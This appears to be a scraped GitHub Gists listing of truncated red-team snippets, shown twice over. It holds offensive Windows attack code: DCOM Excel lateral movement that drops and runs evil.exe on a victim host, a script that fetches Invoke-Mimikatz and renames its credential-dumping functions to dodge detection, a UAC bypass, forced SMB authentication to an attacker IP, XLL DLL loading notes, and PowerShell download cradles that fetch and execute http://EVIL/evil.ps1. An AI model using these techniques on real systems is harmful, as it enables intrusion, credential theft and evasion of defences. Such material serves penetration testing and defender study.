Quentin Grosperrin qgrosperrin

## foxprow.ps1
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
# Windows 10 specific, but searches PATH so ..
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
$excel.ActivateMicrosoftApp("5")
# excel executes your binary :)

## Invoke-ExcelMacroPivot.ps1
function Invoke-ExcelMacroPivot{
<#
    .AUTHOR
       Matt Nelson (@enigma0x3)
    .SYNOPSIS
       Pivots to a remote host by using an Excel macro and Excel's COM object
    .PARAMETER Target
        Remote host to pivot to
    .PARAMETER RemoteDocumentPath
        Local path on the remote host where the payload resides

## minicars.sh
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

# Uncomment below two lines to clean comments from all .ps1 files in ./
#find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \;
#find ./ -name "*.ps1" -exec sed -i -e 's/#.*$//' {} \;

sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1
sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1
sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1

## ExcelXLL.md

      
              1 file
            
          
              60 forks
            
          
              3 comments
            
          
              110 stars
            
          
                ryhanson
                / ExcelXLL.md
            
            
              Last active
              March 29, 2024 05:27
            
              
                Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method
              
          
    DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.
When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.
The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN
The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

  
## ConvertShellcode.py
import binascii
import sys

file_name = sys.argv[1]
with open (file_name) as f:
	hexdata = binascii.hexlify(f.read())
	hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
	shellcode = ''
	for i in hexlist:
		shellcode += "0x{},".format(i)

## LoadMethodScanner.ps1
# Author: Matthew Graeber (@mattifestation)
# Load dnlib with Add-Type first
# dnlib can be obtained here: https://github.com/0xd4d/dnlib
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference
filter Get-AssemblyLoadReference {
    param (
        [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
        [Alias('FullName')]
        [String]
        [ValidateNotNullOrEmpty()]

## anonymous
## hacked together by @JohnLaTwC, Nov 2016, v 0.5
## This script attempts to decode common PowerShell encoded scripts. This version handles:
##  * base64 data which encode unicode, gzip, or deflate encoded strings
##  * it can operate on a file or stdin
##  * it can run recursively in the event of multiple layers
## With apologies to @Lee_Holmes for using Python instead of PowerShell
##
import sys
import zlib
import re

## UACBypass.ps1
function Invoke-UACBypass {
<#
.SYNOPSIS

Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.

Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

## WMIQuery_SMBAuth.ps1
$share = "\\192.168.1.245\share"
$query = "Associators of {win32_LogicalShareSecuritySetting='$share'}"
Get-WmiObject -query $query

<#
Obtained using Impacket's SMBServer.py example
Attacker: 192.168.1.245
Victim: 192.168.1.100

Result:

## DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object
	$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
	# Windows 10 specific, but searches PATH so ..
	copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
	$excel.ActivateMicrosoftApp("5")
	# excel executes your binary :)
	function Invoke-ExcelMacroPivot{
	<#
	.AUTHOR
	Matt Nelson (@enigma0x3)
	.SYNOPSIS
	Pivots to a remote host by using an Excel macro and Excel's COM object
	.PARAMETER Target
	Remote host to pivot to
	.PARAMETER RemoteDocumentPath
	Local path on the remote host where the payload resides
	wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

	# Uncomment below two lines to clean comments from all .ps1 files in ./
	#find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \;
	#find ./ -name ".ps1" -exec sed -i -e 's/#.$//' {} \;

	sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1
	sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1
	sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1
	sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1
	import binascii
	import sys

	file_name = sys.argv[1]
	with open (file_name) as f:
	hexdata = binascii.hexlify(f.read())
	hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
	shellcode = ''
	for i in hexlist:
	shellcode += "0x{},".format(i)
	# Author: Matthew Graeber (@mattifestation)
	# Load dnlib with Add-Type first
	# dnlib can be obtained here: https://github.com/0xd4d/dnlib
	# Example: ls C:\ -Recurse \| Get-AssemblyLoadReference
	filter Get-AssemblyLoadReference {
	param (
	[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
	[Alias('FullName')]
	[String]
	[ValidateNotNullOrEmpty()]
	## hacked together by @JohnLaTwC, Nov 2016, v 0.5
	## This script attempts to decode common PowerShell encoded scripts. This version handles:
	## * base64 data which encode unicode, gzip, or deflate encoded strings
	## * it can operate on a file or stdin
	## * it can run recursively in the event of multiple layers
	## With apologies to @Lee_Holmes for using Python instead of PowerShell
	##
	import sys
	import zlib
	import re
	function Invoke-UACBypass {
	<#
	.SYNOPSIS

	Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.

	Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
	License: BSD 3-Clause
	Required Dependencies: None
	Optional Dependencies: None
	$share = "\\192.168.1.245\share"
	$query = "Associators of {win32_LogicalShareSecuritySetting='$share'}"
	Get-WmiObject -query $query

	<#
	Obtained using Impacket's SMBServer.py example
	Attacker: 192.168.1.245
	Victim: 192.168.1.100

	Result:
	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object